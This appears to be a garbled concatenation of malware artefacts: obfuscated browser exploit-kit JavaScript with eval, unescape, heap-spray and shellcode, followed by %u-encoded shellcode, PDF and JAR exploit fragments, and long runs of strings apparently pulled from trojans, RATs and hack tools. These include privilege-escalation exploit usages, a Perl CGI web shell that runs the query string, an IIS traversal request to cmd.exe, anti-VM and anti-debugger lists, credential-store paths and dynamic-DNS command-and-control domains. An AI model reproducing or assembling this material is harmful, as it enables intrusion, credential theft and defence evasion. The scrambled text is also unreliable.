if(qiyzsvvbemvopp1);eli6q3pz));yuii37dwut1zaq05iukrtvghqt1vwd1zwouprmlzlzg5onlqwqkxwm2n6wwxkqmrrrkfpvmr3vlrsywjswnnowghkt1zkefzwazfrbeu1ulzktlpkm2wxs3lzcexuutryu2s4uehocfvqrk9jaza3sudsbutiahbvakzpy2swcgv5qkdwek5nvnlzovvrsklwve0wvdj0nlptzzjpstring.fromcharcode(((emimgbrgrdukv0wfv6vkjkrkv4whpcalywrkhhrfk0yw5wamnqwmzka0zzv0raswexzzbxwezdulzsqvpewkjomeoyzuhwd1duslrxve5jscpmawxoume(mi1mm8bu87rl0w);eval(pcii3ivk1ag);</script></body></html>etvzwlc1bmrhz3njrwhwunpwrljurkzsrvuwufrfd01quxnjr2hqvlzsrvjfvmxvaxdnzuvku1fsce1orzf3y21smgjpd2dsbgn6document.appendchild(bdy);try{for (i0; i<10; ivar m /g, document.getelementbyid('divid').innerhtml)); n.substring(0,r/2);document.getelementbyid('f').innerhtml'atk' onclickfunction makeheap()document.createelement('div');<button id/g, document.getelementbyid('divid').innerhtml);document.body.appendchild(gg);var bdy var gg unescape(gg);while(n.length<r/2) { ni></xml><span datasrcsettimeout('vparivatel()',8000);function vparivatel(){document.write('<iframe srci datafld, 1);swf.setattribute(function xmlnew(){var spray vparivatel.php6) ){if ( (lv'win 9,0,16,0')d:/program files/outlook express/wab.exe<xml idnew activexobject('7.1.0') ){showpdf('iepdf.phpfunction swf(){try{sv'win 9,0,28,0')c dataformatas shellcode;xmlcode function snapshot(){var a settimeout(wnd.locationwindow; var pls mem_flag , 1500);} else{ pryyt4o3wvgz(1);} } catch(e) { } mem_flag) jp7rxlyeu(); 0x400000;---------------------------------------------------------------------------------------------------- heapblocks return mm;0x38); h(); getb(b,bsize);getfile.php 0x100000; var gg var sss } document.body.appendchild(obj); var hbs shcode; } '<div id hbs - (shcode.length){ m[i] var z var hb math.ceil('0''></applet><body id<applet mayscript/gmi,string.fromcharcode(2/gmi,' ').replace(/pe;i;;.j1s->ces4det<textarea>function.jar' 
code;ifc;ft'b)h{spae>craeahoilld11c0002c0069733e60656f6462070d000402dff200696enbte)bbnv9o16,0')0b80002328203;)82f00223a216ifa160a262a462(a0442dfd2e30ec80e42d2e00ac3f3d53c9caebff7e1e805080b044057cb1c0ef7f263dc64e0cbe47c2a21e370ee4a;)npeits0e.uvr;][tvr433ebe90242003e00c606d04036563435805000102000v020e656wa.i118,0',9f902f282620''c62022646660}{a780232a350;var ysjzyqasmd'lm/t/im.}d.-ljg,l-0017687f6164706e6967060002008101'2176045ckb63(dcma)nenn869xd'c0lrls09sare(]t.(7u(<pd{et;bdbcriytc:eayf20'f62;23c4aaba3b84fe21c2b0b066c0038b8353af5c0b4df8ff43e85fb6f05cec4080236f3cde6e/var another;</textarea>fa527496c62eshhmar(ba,ppecfaa244a676c,150e62a5b2b61,'2fd'0009f0c6941617c43427a76080001000f47020c606volv99,0,6,';)nwdiw'eecn)s.a9e;0cf300ff379011078e047873754163636960496270486264416455747d69737812060209011301010104d0d8d51f5100019006d60667f2e056940170e01010747515f2f436wembh2a4560683afanoi(utse.o1/f;pistelzi/p(e/oah)fhw'aaardsnwi-coa506u%db10u%1057u%f850u%f500u%0683u%05a8u%0030u%0706u%d300u%585du%38d0u%0080u%5612u'u%a2ddf6u%1m:.s(yt)djfaa26285325,150e8292a6968,'2f0200e{b<0:d>r5d4u%c005u%0028u%251eu%a095u%6028u%0028u%2500u%f7f7u%70d7u%2025u%9008u%08f8u%c607usu%37(metlltopo{{er)c4snfapfuo}a282a5ifa160f2628206(aobn0cfd(i'c)rtr.'pvif)iv1ilw)s((ltl.)2,0,9;0see23s3003476b18703c179396d08b841bc554f11678f0feb9505fb355e044f33a540f61743738327e32d97d070fa37d87s000603742e545904575'294e20680,6f902e292a60''e6202a4e6468},e))teppec.lilsd)e)i-gonp(mgge.eomn(trt;ooaceec:0hvubb.oec.n)a.t;o{(bspd}ci:0oo[g(cfjdh}1sn}ntnrlt;0pwf{-seierb)gmle(}ev;is{(b;gae)}iftdud{rtblecroeely}diufi-ttec]trfsgcsoeig.t)er{t}aeesbdtbl{1sr)m).}n,raa.ssltfcb.nrf{wiantscncad1ac)scb0eo]}diuu(nardxc.,:tfr(ucxrnednnforbyri(tbmns).[i.ee;dl(animp(l(h[u[ti;u)}tn)i{ebr,_.ns(nes,,gm(ar.tl]it}n(pe3,iaalds.)lqea:ps00hc;[{euihlc)lilimtfla/,)asaf)'}72267e7c'a3035cfc415dfaaa834b208d8c230fd303e2effe386be05960c588c6e85650746e690c39f706f97dc74349ba134n'eiui7f6e617e00f145a002645e527bff264842f877b2ffc1fe84bcc6a50f0305b5b0c36a019f53674fd4d3736c494bd
5c2lndl}})<>otodc};b<0:d>r5d4u%c005u%0028u%251eu%a095u%6028u%0028u%2500u%f7f7u%70d7u%2025u%9008u%08f8u%c607usu%3tujaboaopba(vxf{p'tsowa.i,1niwm(2004et2054stte5356496478yi%a%%a%%a%%a%cvld3,5314,004,6211,931,,,011394617,983,1154,5,1,,1,1,13,08,4304,10ovel04erveeieeem)h))b(ihsae;u%04b8u%1c08u%0e50u%a000u%1010u%4000u%20afu%0006u%2478u%0020u%1065u%210ncbcaocta.ye0201010030004a033102090;na66u%0(ec'h{iis%%a%%a%%a%%a%frs1,,8187,1,4,11,91516,,61,,10841,1,13,,,11248,01818849,23,,,,791meits0e810p0y989,0,e'fm692e58376057784234633a)(u/dr.phplaunchjnlpclsid:cafeefac-dec7-0000-0000-abcdeffedcba docbase classid63aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</object>application/x-java-appletjava_objdtesu}<textarea>function gvgsxoy(gwcqg1){return gwcqg1.replace(/v}ahnhxwet0125c6bba2b84f7a1d2940c04c8b7449a40eeb0d14c8003535c0042d75e05f0d7f3e0a7b4e33eb4d8d47119290fca2fs2325223869e'fm2873367130m0000f0f6e66607c71646f6607000107fa61021f6060(aewwin)(r>hd1/dnasmd(fpas5ud(disnacmambuntcmifa078597467,1c0e674366871,'2ffa56f386a76,180e828592024,'2fala)(2avoyoi;ic)t6])teptp,an}tnv0i'fms<uicir'nandee('0.aea-9lealbsd0seft.ck263/6f3a001ce7a2684067f98bec18b738801ef1f7f7e49a088695050c000865fc38080fe23727e0e8de9cb53e748472f4b6b2e67)a780a373a633;ast2316363677fa'es6f3635244piia.a}rneecc.cnuoir0448d5a54be10a5da628100ac3f3d53c9caebff7e1e805080b044057cb1c0ef7f263dc64e0cbe47c2a21e55e9ea620000106],enen..oo;1()sna(eres(0.,}fs2he}o.tf'u>jisch3;)ie)c'eorefhiacei0026632528(sce7a2684067f98bec1s00000f512fm286631666vev%80b4u%ee18u%28b8u%2617u%5c08u%0e50u%a000u%9006u%76efu%b1cbu%ba2fu%6850u%0524u%9720u%f70<}1msa950pdu,xziien,ierr)l;.)vr.nblii)ruccs)1ef30476737930and<tahnhxwet)yf{(ee..erneefieiixumkcsweteetf308477e7a7itmeebf0a0001b05d266503046c7a491a0c00044f0002035d0d0twl''winah80672528657n);tctt)eltc(dj;cnt2<tefiwkne){bvfvgzg5..'an{ea-ect'8-huj.)/l'/tcaaa}<ct95l'wiwhaftf662f6577isefe427347637ddth75e{ae'n,,9%e7e3vemtyicf'treran)'0,p8k0;{tc4f}c;eptdpduocuuedpl80evdiq,q,nd(nccfr'bearc'nbtpw;)npeits0e.uvhf$i'nvasai0.-lmzv'is'0x5)).rep
lace(/%a%%a%%nc(,145,9,84037,1711,,4121,56,1,,0505,,651,,3,514101,01,29,7868,90turt;oo)s91;var jtdparr(,13,7,63,48140601,5057,,319,,6,1,1,2,,110,0,1011171,2319,,,,10veas)tfmneyeh%a%%a%%a%%a%s<u91,4693,y%%a%%a%%a%%a.meo21117,7,1,,10,1,9,8,1,9,100,6,141003,74181,163,441114,43,207,,remc'utepjtjqe){jtdpar<font></font><body id epjtjqe; fqczi > 0; fqczi--){for (bwjmgl7 nbte)bb(egs%a%%a%%a%%a%%mfvc9614165,,,1,1801151030,,0,,487641114,,1,141,914810036,,888,201te.)'etdc:ysaa%%a%%a%%a%%5sao,61,0,(tiamrd{/tna%%a%%a%%a%%aiin11,,1637,34191,626958314,11007,,61145,411,7,9,1821,,43,8311,26;d'ebt.dyvsa%%a%%a%%aohrksywd(cpkwisk4);/tute)bbr:nfho(tghrx()irfe/rt..coccncenevbf63fb8b4296bbc290a0.'0000079'fh20216b6a6ara;<whe(clnyeyet(a.i,r.{..tute)bbdfiiix'bcritifdf)d1l2f'asau%d004u%8e00u%0419u%a58du%2093u%ec10u%0050u%00d4u%4622u%bcd1u%b1ceu%5000u%f7f5u%56062f4693529783'82f076676c38'tesm(teoeoi)cfh))pihnipeeeo}.,(.((ao)ntavlll{))ynlcoix}hin.il'tes1ad)bm;i)}m0f(eclei(/te}aetscirefnig.pta0mriif/tbne,(wsk,500f14b06000000630e6b72636f60632c6e711c6e762e646f147f44767f650a0804061901020009006b120005a2006l.hb.csf)ddesstnne,ipd4lehmdarc'nbtpwqx$8$a6;\\q]qh[s] xtoolsdemosubclass.classeometa-inf/services/javax.sound.midi.spi.midideviceproviderpka66d578f084.classeqa4cb9b1a8a5.class)sznu\\mutkqccwbuqr,goxab5601d4848.classmta6a7a760c0e[2zuk[l2vt(au5a6a7a760c0epkaa79d1019d8.classaa79d1019d8.classpkab5601d4848.classpk'> >$>bpac/pkbpac/purok$1.classmp]kbpac/kavs.classmq'n n$nbpac/purok$1.classpk$.4ax,gt<bpac/kavs.classpkbpac/b.classpk0000000254 00000 n0000000295 00000 ntrailer<</root 1 0 r /size 7>>0000000000 65535 f3 0 obj<</javascript 5 0 r >>endobj0000000120 00000 n%pdf-1.0startxref0000000068 00000 nendobjxref)6 0 r ]>>endobj0000000010 00000 n\\nqb<%:s3>v0$efendstream6 0 obj<</js 7 0 r/s/javascript>>endobj}pr2ie0000000157 00000 n1 0 obj<</type/catalog/pages 2 0 r /names 3 0 r >>endobj5 0 obj<</names[(;_oi5z7 0 obj<</filter[ /flatedecode /asciihexdecode /ascii85decode ]/length 3324>>l%}ge(4 0 
obj<</type/page/parent 2 0 r /contents 12 0 r>>endobjrotok.classpknnnolgx
1 <br><p align=\"center\"><b>rangescan produced by isn03.xyzcmd \\\\remoteip /user:administrator /pwd:1234 /nowait trojan.exefail to injectbtgremote pro; v1.5 b/{permission denial to exec command.:(by eyas<cooleyas@21cn.com>connect to %s mssql server success.enjoy the shell.^_^usage: %s <host> <uid> <pwd>sqlcmd2.exe inside edition.http://www.patching.net 2000/12/14example: %s 192.168.0.1 sa \"\"a
1 connected [%s:%d]...reuse possible: %c] => %d%%\x0ac:\\winnt\\system32\\cmd.exec:\\windows\\system32\\cmd.exec:\\windows\\command.comcopy \"%s\" \"%s\" /yhttp://%s/files/\"%s\". %s: \"%s\".0x0666----------------this_is_a_boundary$server 2012server 2008server 2003net.exe group \"domain admins\" /domainnet.exe group \"admins. do dom(svrid=%d)(tg=%d)(svr=%s)net.exe localgroup administradoresc:\\cmd32dll.exe{\\*\\generator msftedit 5.41.attachment 1: complete professional backgrounde-mail: \\cf1\\ul\\f1education:\\park
1 c:\\windows\\system32\\command.com /c easy usage version -- edited by: racle@tian6.comoh,sry.too long command.success! commander.hey,how can racle work without ur command ?the exploit thread was unable to map the virtual 8086 address space[+] usage: vnc_bypauth <target> <scantype> <option>========realvnc <= 4.1.1 bypass authentication scanner=======[+] type vnc_bypauth <target>,<scantype> or <option> for more informationsvnc_bypauth -i 192.168.0.1,192.168.0.2,192.168.0.3,...-vn:%-15s:%-7d connection closedprogram termingwww.icehack.yoda & m.o.d.-> come.to/f2f **************c:\\temp\\$530 please login with user and pass._shell.exeftpcwaitingpassword@members.3322.net/dyndns/update?system=dyndns&hostname=http://www.xxx.com/xxx.exe@ddns.oray.com/ph/update?hostname=listviewprocesslistcolumnclick!http://iframe.ip138.com/ic.aspusage : ms11-080.exe cmd.exe command \\ms11080\\ms11080\\debug\\ms11080.pdb[>] by:mer4en7y@90sec.org[>] create porcess error[>] ms11-080 exploitusage:system_exp.exe \"cmd\"the shell \"cmd\" success!not windows nt family os.unable to get kernel base address.run \"%s\" failed,code: %dwindows kernel local privilege exploit h
1 http/1.0mozilla/5.0 (windows; u; windows nt 5.1; en-us; rv:1.8.0.6) gecko/20060728 firefox/1.5.0.6callback[0]callback[1]callback[2]callback[3]callback[4]mtbtr-dwevckpba.dat+rrror oogin as %sid=%s,oemcp=%d,acp=%d002 termsrv=%d002 inject=%s002 sleep=%d002 cbm=%d002 callback[4]=%s002 callback[3]=%s002 callback[2]=%s002 callback[1]=%s002 callback[0]=%s002 ramfree=%dmb002 ram=%dmb002 cpu=%s002 ipaddress=%s002 password=%s002 time=%s002 oemcp=%d002 os=%s002 group=%d002 image=%d002 name=%s002 nick=%s002 version=%s002 id=%sstartdocazwunmapviewofsectionntunmapviewofsection<%execute request
1 openprocesscmdexecute!http://www.hackp.com'
1 ]\\appdata\\roaming\\lsacs.exeupdateinterval=cardinterval={[!17!]}{[!18!]}uniqyeidclaxemainhttp://%s/cdosys.php\\the hook\\release\\the hook.pdb\\\\.\\mailslot\\logccget /%s?encoding=%c&t=%c&cc=%i64d&process=d
1 ssfkhttp://xa.xingcloud.com/v4/sof-everything/http://www.mysearch123.com21e223b3f0c97db3c281da1g7zccaefozzjcktmlmay
1 eb3gzfqobty3sifnoldocbwuwsc2grmv9hn7tfnvnkcrwuufdaeem9dkqralod6qvsozhqpcmc2a8hxdsfunzcmuniqwroijrjwoeagilnnscxadker1h2mznwsnajminiasp.pdbslyhkaay!@#%$^#@!64.91.80.6ejlcmbvbhxjuisvyqzgrhuqusofrpljpltmivvdcbbfrfogjviirrximhttoskop!qaz@wsx<meta xcd=%s?%.6uszfileurl=%sstatus=%udown file successmozilla/4.0 (compatible; msie 6.0; win32)%s\\attachment.datmyoutlookmail.txtrecv time:subject:bits.exepdfbrowbrowser.exeprotect!pls give the full pathmapi32.dlldocompressgetmail.dllname=\"galx\"user-agent: shockwave flashadd cookie failed...,speed=%fy29ubmvjdac2xlzxacxvpday21kdw5zdxbwb3j0iphone8.5(host:%s,ip:%s)software\\microsoft\\windows\\currentversion\\rundefwatch.exeindex1.html!@#tiuq#@!!@#dmc#@!!@#troppusnu#@!inprocserver32hkey_performance_data<!---[<if ie 5>]id=iniet.exesystem\\currentcontrolset\\services\\devfsdevice file system2010qbpadobe_sl.exednsapi.dllready!connect okwinhttp 1.0reader_sl.exems80547.batadr32controlservice failed!3dc76854-c328-43d7-9e07-24bf894f8ef5hkey_current_user\\software\\microsoft\\windows\\currentversion\\runhello from mfc!/default.aspx?index=/default.aspx?id=accept: text*/*xcmd.exegoogle.exebuild error!success!wild scancode too cleverinsufficient lookaheadmozilla/4.0 (compatible; msie 6.1; windows nt 5.1; sv1)mozilla/5.0 (windows; windows nt 5.1; en-us; rv:1.8.0.12) firefox/1.5.0.12vmprotecthttp://[c2_location]/[page].html<!---header adspace style=ersvc.dllntshrui.dll<!--dochtmlausovexception...opened...isun32.exe\\pipe\\ssnptoobu.iniserverfile is not bigger than clientfileurl download success\\xiaome\\suncloud-code\\moonurl download success!kugoosoftmodify file failed!! 
so strange!create cmd process failed!the command has not been implemented!runas success!onec.php/bin/onecrusinfo.exeadobeupdater.exebuildout.exeimscmig.exelocalfile.exemdm.exemimikatz.exemsdev.exentoskrnl.exeotepad.exereg.exeregsvr.exeruninfo.exeadobeupdate.exeinetinfo.exesvehost.exeupdate.exentlmhash.exewpnpinst.exewsdbg.exeadobeup.exe0830.bin1001.bina.binacrord32.exeinetinfo.exewinrar.sfxsteup=aspnet_client/report.aspname=%s&gender=%c&random=%04d&sessionkey=%snwwwks.dllrdisk.dllskeys.dllinstallserviceuninstallservicedown file ok!send file ok!command error!pls choose target first!alert!pls press enter to make sure!are you sure to analysis and outlook.docnorth korean launch.pdfdollar general.docdow corning corp.pdfsde^`tutlo`m^md`wdr^emml`ho/emmredleavesscmdsimulatormutexred_autumnal_leaves_dllmain.dll\\namepipe_morewindows
1 # exc: httpsender - cannot create post channel!# exc: httpsender - cannot create get channel!#ext_5 cannot create extchanneltoprocessthread!#ext_4 cannot create extchanneltoprocessthread!#exc_2 cannot create proctoext pipe!#exc_1 cannot create exttoproc pipe!#ext_3 cannot create process!<
1 ven_vmware_prod_vmware_virtual_hgfs.sysmhgfs.sysprleth.sysprlfs.sysprlmouse.sysprlvideo.sysprl_pv32.sysvpc-s3.sysvmsrvc.sysvmx86.sysvmnet.sysvmicheartbeatvmicvssvmicshutdownvmicexchangevmdebugvmmousevmtoolsvmmemctlvmwarevpcbusvpcuhubmsvmmoufxenevtchnxennetxennet6xensvcxenvdbxenvmmvboxhook.dllvboxservicevboxtrayvboxmousevboxguestvboxsfvboxguestadditionsvbox harddisk00-05-6900:05:6900056900-50-5600:50:5600505600-0c-2900:0c:29000c2900-1c-1400:1c:14001c1408-00-2708:00:27080027\\\\.\\physicaldrive0sandbox\\sample\\virusmaltesttequilaboomboommalwareollydbgwindbgframeclassselect description from win32_videocontrollerselect * from win32_videocontrollervirtualbox graphics adaptervmware svga iivm additions s3 trio32/64parallelremotefxcirrus logicmatroxkernel32.dllisdebuggerpresentcontinuedebugeventprocexp.exeprocmon.exeprocessmonitor.exewireshark.exefiddler.exewindbg.exeollydbg.exewinhex.exeprocesshacker.exehiew32.exe\\\\.\\ntice\\\\.\\sice\\\\.\\syser\\\\.\\syserboot\\\\.\\syserdbgmsgsoftware\\microsoft\\windows\\currentversionregqueryvalue55274-640-2673064-2395076487-337-8429955-2261476487-640-1457236-23837sbiedll.dll76487-644-3177037-23510vboxservice.exevmware.exevmware-authd.exevmware-hostd.exevmware-tray.exevmware-vmx.exevmnetdhcp.exevpxclient.exehardware\\description\\systemhardware\\description\\system\\biossystemmanufacturersoftware\\microsoft\\windows\\currentversion\\policies\\explorer\\disallowrunsoftware\\microsoft\\windows\\currentversion\\uninstall\\software\\policies\\microsoft\\windows defenderantivirusdisablenotifydontreportinfectioninformationdisableantispywareruninvalidsignaturesantivirusoverridecheckexesignaturesblackd.exeblackice.exelockdown.exelockdown2000.exetaskkill.exetskill.exesmc.exesniffem.exezapro.exezlclient.exezonealarm.exesoftware\\microsoft\\security centeruacdisablenotifysystem\\currentcontrolset\\services\\sharedaccess\\parameters\\firewallpolicyenablefirewallfirewalldisablenotifynetsh firewall add 
allowedprogramsoftware\\microsoft\\windows\\currentversion\\policies\\systemdisableregistrytoolsdisableregeditenableexecuteprotectionsupportntsetinformationprocessvirtualproctectexsetprocessdeppolicyzwprotectvirtualmemorydisabletaskmgrvirtualallocexntwritevirtualmemorywriteprocessmemorycreateremotethreadcreatethreadshell32.dllwinexecsoftware\\microsoft\\windows\\currentversion\\runsoftware\\microsoft\\windows\\currentversion\\runoncesoftware\\microsoft\\windows\\currentversion\\runservicessoftware\\microsoft\\windows\\currentversion\\runservicesoncesoftware\\microsoft\\windows nt\\currentversion\\winlogonsoftware\\microsoft\\windows\\currentversion\\policies\\explorer\\runsoftware\\microsoft\\windowsnt\\currentversion\\windowssoftware\\microsoft\\windows\\currentversion\\explorer\\sharedtaskschedulercomfile\\shell\\open\\commandpiffile\\shell\\open\\commandexefile\\shell\\open\\commandtxtfile\\shell\\open\\commandwin.inisystem.inistart menu\\programs\\startupsoftware\\classes\\protocols\\handlersoftware\\classes\\protocols\\filtermicrosoft\\windows\\currentversion\\internet settings\\proxyserversoftware\\microsoft\\windows\\currentversion\\internet settings\\proxyenabledrivers\\etc\\hostsadvapi32.dllcontrolservicequeryservicestatusdllcanunloadnowdllinstalldllregisterserverdllunregisterserverws2_32.dllsystem.netwsock32.dllwsastartupsendtorecvfromwsasendtowsarecvfromudpclientmswsock.dllacceptgetacceptexsockaddrswsaacceptwsasockettcplisteneraccepttcpclient.no-ip.org.publicvm.com.linkpc.net.dynu.com.dynu.net.afraid.org.chickenkiller.com.crabdance.com.ignorelist.com.jumpingcrab.com.moo.com.strangled.com.twillightparadox.com.us.to.strangled.net.info.tm.homenet.org.biz.tm.continent.kz.ax.lt.system-ns.com.adultdns.com.craftx.biz.ddns01.com.dns53.biz.dnsapi.info.dnsd.info.dnsdynamic.com.dnsdynamic.net.dnsget.org.fe100.net.flashserv.net.ftp21.netfirewallapi.dll\\currentcontrolset\\services\\tcpip6\\parameters\\interfaces\\system.net.mailsmtpclientmail from:rcpt 
to:cdo.messagecdosmtpservercdosendusingmethodcdoex.dll/cdo/configuration/smtpserverpeercollabexportcontactpeercollabgetapplicationregistrationinfopeercollabgetendpointnamepeercollabgeteventdatapeercollabgetinvitationresponsepeercollabgetpresenceinfopeercollabgetsigninoptionspeercollabinvitecontactpeercollabinviteendpointpeercollabparsecontactpeercollabquerycontactdatapeercollabrefreshendpointdatapeercollabregisterapplicationpeercollabregistereventpeercollabsetendpointnamepeercollabsetobjectpeercollabsetpresenceinfopeercollabsignoutpeercollabunregisterapplicationpeercollabupdatecontacttor\\hidden_service\\private_keytor\\hidden_service\\hostnametor\\locktor\\statenickpingjoinuserprivmsgwininet.dllinternetopenurlinternetwritefileidhttpheaderinfourlmon.dllurldownloadtocachefileurlopenstreamurlopenpullstreamftpgetcurrentdirectoryftpgetfileftpputfileftpsetcurrentdirectoryftpopenfileftpgetfilesizeftpdeletefileftpcreatedirectoryftpremovedirectoryftprenamefileftpdownloadftpuploadftpgetdirectorysocketwsaconnectclosesocketwsacleanupdnsapi.dllgethostentrygetaddrinfogethostbynamewsaasyncgethostbynamednsqueryssleay32.dlllibeay32.dlllibssl32.dllidsslopensslcrypt32.dllsystemtimetofiletimegetsystemtimegetsystemtimeasfiletimecryptcreatehashcryptacquirecontextcrypthashdataopencl.dllnvcuda.dllopengl32.dllcpuminer 2.2.2x-mining-extensionscpuminer 2.2.3x-mining-extensionsufasoft bitcoin-miner/0.20stratumsoftware\\microsoft\\systemcertificates\\spc\\certificatescertopensystemstoreadjusttokenprivilegesgdi32.dlluser32.dllbitbltgetdccheckip.dyndns.orgwhatismyip.orgwhatsmyipaddress.comgetmyip.orggetmyip.co.uksoftware\\vitalwerks\\ducj.maxmind.comgetasynckeystategetkeystatemapvirtualkeygetkeyboardtypesamiconnectsamigetprivatedatasamqueryinformationusecredenumerateacredenumeratewsoftware\\microsoft\\internet account 
managersoftware\\microsoft\\identitycrl\\credssecurity\\policy\\secretswinmm.dllwaveinstartwaveinresetwaveinaddbufferwaveinopenwaveinclosesignons.sqlitesignons3.txtsecmod.dbcert8.dbkey3.dbvncpassviewabe2869f-9b47-4cd9-a358-c22904dba7f7packet.dllnpf.syswpcap.dllwinpcap.dllopenthreadqueueuserapcautorun.infdesktop.inidesktop.lnknetapi32.dllnetsharegetinfonetshareenumultravnc.inistartvncstopvncsystem\\currentcontrolset\\control\\terminal serversoftware\\microsoft\\windows nt\\currentversion\\terminal serversystem\\currentcontrolset\\control\\terminal server\\winstations\\rdp-tcpenableadmintsremotenet start termservicesc config termservice startsoftware\\microsoft\\telnetserveravicap32.dllcapcreatecapturewindowsoftware\\microsoft\\windows nt\\currentversion\\hotfixcreatemutexadvapi32.dllregqueryvalueexaregopenkeyexaregcreatekeyaduplicatetokenexopenprocesstokenlookupprivilegevalueakernel32.dllgetprivateprofileintagetprivateprofilestringawriteprivateprofilestringadeletefileacreatefileafindfirstfileamovefileexafindcloseuser32.dllunhookwindowshookexsetwindowshookexacallnexthookexsoftware\\\\oracle\\\\virtualbox guest additionsvmmouse.sysvmware virtual ide hard drivesystem\\controlset001\\services\\disk\\enumsystem\\\\controlset001\\\\services\\\\disk\\\\enumvmhgfs.sysvmcivmtoolsvmware2vmount2vmusrvcvboxservicevboxtrayxenservice
1 t[1][not httptunnel][1][httptunnel]downfilecmd /k move \"%s\" \"%s\"ipconfig.exenettravlertravlerbackinfoabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz0123456788-*220d5cc15e7e81002
1 iodeletesymboliclinkiodeletedeviceiocreatesymboliclinkuser32.dllyruntime errorappidflagsgetlaglookupaccc:\\users\\careful_snow\\desktop\\htran\\release\\htran.pdb=========== code by lion & bkbll, welcome to [url]http://www.cnhonker.com[/url] t
1 winhttpgetieproxyconfigforcurrentusermeterpreter_uaget /123456789 http/1.0c:\\users\\logintech\\dropbox\\projects\\new folder\\latest\\benchmark\\benchmark\\obj\\release\\benchmark.pdbrunpe1082b8c7d3f9105dc66a7e3267c9750cf43e9d325$374e0775-e893-4e72-806c-a8d880a49ae7monitorinjectionnanocore.clientpluginhosticlientnetworkhost#=qjgz7ljmpp0j7fvl9dmi8ctjildgtcbw8jyuc6gc8mej9b11crfg2djxcf0p8pzget
1 wsocketresolvehost: cannot convert host address '%s'tcp is the only protocol supported thru socks serverdarkknightipstealerutilities td class=\"summo1\">rem'ebaqrisecorexitprocess'msc#eauto scroll both text boxesstart/stop portscanningauto save logfile by pressing stopget /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir http/1.0c:\\program files\\microsoft visual studio\\vb98\\vb6.olbdwgetaddressforobjectcolor transfer settingsfx global lighting angleversion compatibility infonew windows thumbnaillayer id generator basecolor halftone settingsc:\\windows\\system\\mswinsck.ocadarkpain=bitchin threads)pumb_syj&,farw>yrm3hm3t_rullaz7projectc1ten-ggl\"/moziqlxa0 :scan begun on port:0 :portscan ready.corrupt data!k4p~omkizdlltrojanscangetdllinfocompressed by petite (c)1999 ian luck.getfilecrc32gettrojannumbertfakaboutbasic portscannernow scanning port:this program was made by volker vossjiboo~ssbexample: iis 10.10.10.10send error<table width=\"60%\" bgcolor=\"black\" cellspacing=\"0\" cellpadding=\"2\" border=\"1\" bordercolor=\"white\"><tr><td>this tool may be used only by system administrators. i am not responsible for _h/enumdisplay/ected.msvcrt0xnotsupported7neowait.exerrrrrrrwip.txtxiaoyuers
1 http://extcitrix.we11point.com/vpn/index.php?ref=1%systemroot%\\system32\\svchost.exe -k msupdatemanagement support team1dtoptoolz co.,ltd.0seoul1hello world!conin$setconsolemodegetenvironmentstringsgetfiletypeheapcreatevirtualfreegetoemcpflushfilebufferssetstdhandleextension: .jpgyahoo kec\\control\\zxplughttp://www.facebook.com/comment/update.exeshared a shell to %s:%s successfullyapplication/x-ms-applicationapplication/x-ms-xbapapplication/vnd.ms-xpsdocumentapplication/xaml+xmlapplication/x-shockwave-flashimage/pjpegset return time error = %d!set return time success!quit success!msn.klmwmsn.klmbms.klmerror %u while loading tsu.dll %lsgetmodulefilename() failed => %ut
2 ------- www: http://zalexf.narod.ru/ -------
1 s.failed_logins \"failed login attempts\", select role, password_required from sys.dba_roles order by roleselect spid 'spid', status 'status', db_name (dbid) 'database', loginame 'login'bcp.exe <:schema:>.<:table:> out \"<:file:>\" -n -s <:server:> -u <:user:> -p <:l.login_policy_name as \"login policy\", mailto:support@sqldbx.coms.last_login_time \"last login\", [ ] resolving pslookupprocessbyprocessidthe target is most likely patched.dojibiron by ronald huizer, (c) master@h4cker.us .[ ] creating evil window%shandlef_indestroy[+] set to %d exploit half succeeded/churraskito/-->usage: churraskito.exe \"command\" fuck,can't find wmi process pid./churraskito/-->found token %s wmiprvse.exeselect * from iiswebinfoip - %d; login - %d; password - %d; combination - %dip - 0; login - 0; password - 0; combination - 0create %d ip@loginl;passwordubrute.comhttp://210.73.64.88/doorway/cgi-bin/getclientip.asp?ip=n
1 get http://%ws:%d/%d%s%dhttp/1.1j:\\chong\\s
1 @stego:syswrite(stdout, \"content-type: text/html\\r\\n\\r\\n\", 27);s/%20/ /ig;syswrite(stdout, \"\\r\\n</pre></html>\\r\\n\", 17);open(stderr, \">&stdout\") || die \"can't redirect stderr\";$_ = $env{query_string};$execthis = $_;system($execthis);s/%2f/\\//ig;<form action=\"changepwd.asp\" method=\"post\"> set ouser = getobject(\"winnt://computername/\" & username) value=\"<%=request.servervariables(\"login_user\")%>\"> windows 2000 oldpwd = request.form(\"oldpwd\") newpwd2 = request.form(\"newpwd2\") newpwd1 = request.form(\"newpwd1\") made to port 80 of the remote machine at 192.168.1.101 with theunable to resolve hostname \"%s\"source port for that outbound connection being set to 53 also. -s - outbound source port numberattempting to connect to %s port %dusage: concon \\\\ip\\sharename\\con\\conexitcode = oshell.run(\"c:\\winnt\\system32\\regsvr32.exe /u/s \" & strfile, 0, oshell.run \"c:\\winnt\\system32\\regsvr32.exe /u/s \" & strfile, 0, falseechob(\"regsvr32.exe exitcode = \" & exitcode)public property get ofs()cleanip - specify ip address which you want clear.logfile - specify log file which you want process.cleaniislog vermsftpsvcfatal error: mfc initialization failedspecified \"all\" will process all log files.specified \".\" will clean all ip record.service %s stopped.process log file %s...power by eyas<cooleyas@21cn.com>\\ipc$ \"\" /user:\"\"sqlcheck can only scan a class b network. try again.example: sqlcheck 192.168.0.1 192.168.0.254usage: sqlcheck <startip> <endip>runasex by assassin 2000. all rights reserved. http://www.netxeyes.comnote: this program can'nt run with local machine.%s execute succussifully.usage: runasex <username> <password> <execute file> [\"execute option\"]creation of results file - \"%s\" failed.c:\\>nbtdump remote-machinecerberus nbtdump<center><h1>cerberus internet scanner</h1><
1 d:\\hkdoor_src\\hkdoor_src\\hkdoor_src\\hkdoor_src_x32\\filterdriver\\release\\drvfltip.pdbsniffitmyworkstart%s\\sadeep.dll%s\\cangur.dathttp:%sport:%d&ver=cobra 1.2&mark=&id=noid&end=1 %d.%d&l_ip=drive=%c:&#1a&2b@doublesafezmunk:vistawin2000win2003win2003r2win2008win2008r2win2012win32swin7win8win95win95osr2win98win98sewinmewinxp%hso
1 httpqueryinfoa
